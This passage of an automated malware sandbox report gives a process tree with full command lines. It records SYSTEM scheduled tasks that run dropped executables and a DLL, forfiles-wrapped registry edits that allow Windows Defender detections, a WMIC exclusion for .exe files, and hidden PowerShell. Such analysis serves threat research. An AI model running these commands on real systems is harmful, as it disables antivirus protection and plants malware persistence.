                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                              PID:6804
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                              schtasks /DELETE /F /TN "MHiaqjbnoCNpItK"
                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                PID:7120
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                schtasks /CREATE /TN "YQZkeEGXXGJdtu" /F /xml "C:\Program Files (x86)\GqgEBhsSxktU2\emTvZjB.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                                                                PID:4884
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                schtasks /CREATE /TN "cosGrOuVCynQy2" /F /xml "C:\ProgramData\PdOICyyFbClqQxVB\SqZjVso.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                                                                PID:5560
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                schtasks /CREATE /TN "PZmGxZPxdZZSPZWvU2" /F /xml "C:\Program Files (x86)\efiAzqQKrQpqActHLvR\mirTIQd.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                                                                PID:4216
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                schtasks /CREATE /TN "NzCzwfloobUmvfgYOrr2" /F /xml "C:\Program Files (x86)\OJMRwiGdhyaHC\dPpzXoN.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                                                                PID:1548
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                schtasks /CREATE /TN "kjGlTxIfJQSbObiUU" /SC once /ST 13:18:07 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\HIoTiJfsoGzpkHVf\yUMXrTIU\agadMLW.dll\",#1 /podidK 385121" /V1 /F
                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                                                                PID:4264
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                schtasks /run /I /tn "kjGlTxIfJQSbObiUU"
                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                  PID:5876
                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI\jtiIpwgL\aiBMLrM.exe
                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI\jtiIpwgL\aiBMLrM.exe" /S 7m
                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                  • Enumerates system info in registry
                                                                                                                                                                                                                                                                                                  PID:5248
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                      PID:6080
                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                                                        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                        • Indirect Command Execution
                                                                                                                                                                                                                                                                                                        PID:6672
                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                            PID:6796
                                                                                                                                                                                                                                                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                                                                                PID:1540
                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                                                            forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                            • Indirect Command Execution
                                                                                                                                                                                                                                                                                                            PID:4964
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                PID:6656
                                                                                                                                                                                                                                                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                                                                    PID:5780
                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                                                                forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                • Indirect Command Execution
                                                                                                                                                                                                                                                                                                                PID:7020
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                    PID:5444
                                                                                                                                                                                                                                                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                      PID:3140
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                                                                  forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                  • Indirect Command Execution
                                                                                                                                                                                                                                                                                                                  PID:7152
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                      PID:6360
                                                                                                                                                                                                                                                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                                                                                          PID:4296
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                                                                      forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                      • Indirect Command Execution
                                                                                                                                                                                                                                                                                                                      PID:5960
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                          PID:5816
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                            powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                            PID:5604
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                                                                                                PID:1896
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m help.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                        • Indirect Command Execution
                                                                                                                                                                                                                                                                                                                        PID:6976
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                          /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                            PID:5980
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                              powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                              PID:6424
                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                                                                                  PID:6960
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                            schtasks /CREATE /TN "bAqRDoFVIdSJfWxTlj" /SC once /ST 22:40:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI\jtiIpwgL\aiBMLrM.exe\" PV /S" /V1 /F
                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                                                                                            PID:5408
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                          schtasks /CREATE /TN "zKCGF1" /SC once /ST 04:53:35 /F /RU "Admin" /TR "\"C:\Program Files\Mozilla Firefox\firefox.exe\""
                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                                                                                                                                          PID:2164
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                          schtasks /run /I /tn "zKCGF1"
                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                            PID:5468
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                            schtasks /DELETE /F /TN "zKCGF1"
                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                              PID:6716
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                              schtasks /DELETE /F /TN "unWjgiOqmrJvCJdsa"
                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                PID:5952
                                                                                                                                                                                                                                                                                                                            • \??\c:\windows\system32\rundll32.EXE
                                                                                                                                                                                                                                                                                                                              c:\windows\system32\rundll32.EXE "C:\Windows\Temp\HIoTiJfsoGzpkHVf\yUMXrTIU\agadMLW.dll",#1 /podidK 385121
                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                PID:7152
                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                  c:\windows\system32\rundll32.EXE "C:\Windows\Temp\HIoTiJfsoGzpkHVf\yUMXrTIU\agadMLW.dll",#1 /podidK 385121
                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                  • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                                                                                                                                                                                                  • Enumerates system info in registry
                                                                                                                                                                                                                                                                                                                                  PID:6432
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                    schtasks /DELETE /F /TN "kjGlTxIfJQSbObiUU"
                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                    PID:6448
                                                                                                                                                                                                                                                                                                                              • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                  PID:7092
                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                  PID:6504
                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                  • Identifies Wine through registry keys
                                                                                                                                                                                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                                                  PID:6304
                                                                                                                                                                                                                                                                                                                                • C:\ProgramData\explorer.exe
                                                                                                                                                                                                                                                                                                                                  C:\ProgramData\explorer.exe
                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                                  PID:5616
                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\service123.exe
                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\/service123.exe
                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                  PID:4436
                                                                                                                                                                                                                                                                                                                                • \??\c:\windows\system32\gpscript.exe
                                                                                                                                                                                                                                                                                                                                  gpscript.exe /RefreshSystemParam
                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                    PID:7044
                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI\jtiIpwgL\aiBMLrM.exe
                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI\jtiIpwgL\aiBMLrM.exe PV /S
                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                    PID:6844
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                        PID:6368
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                                                                                          forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                          • Indirect Command Execution
                                                                                                                                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                          PID:6668
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                              PID:6812
                                                                                                                                                                                                                                                                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                  PID:1400
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                                                                                              forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                              • Indirect Command Execution
                                                                                                                                                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                              PID:2792
                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                  PID:3612
                                                                                                                                                                                                                                                                                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                      PID:7040
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                                                                                                  forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                  • Indirect Command Execution
                                                                                                                                                                                                                                                                                                                                                  PID:1584
                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                      PID:4216
                                                                                                                                                                                                                                                                                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                          PID:5536
                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                                                                                                      forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                      • Indirect Command Execution
                                                                                                                                                                                                                                                                                                                                                      PID:1320
                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                          PID:5844
                                                                                                                                                                                                                                                                                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                              PID:6476
                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                                                                                                          forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                          • Indirect Command Execution
                                                                                                                                                                                                                                                                                                                                                          PID:4832
                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                            /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                            PID:3616
                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                              powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                                                              • Drops file in System32 directory
                                                                                                                                                                                                                                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                                                              PID:5300
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                PID:6680
                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
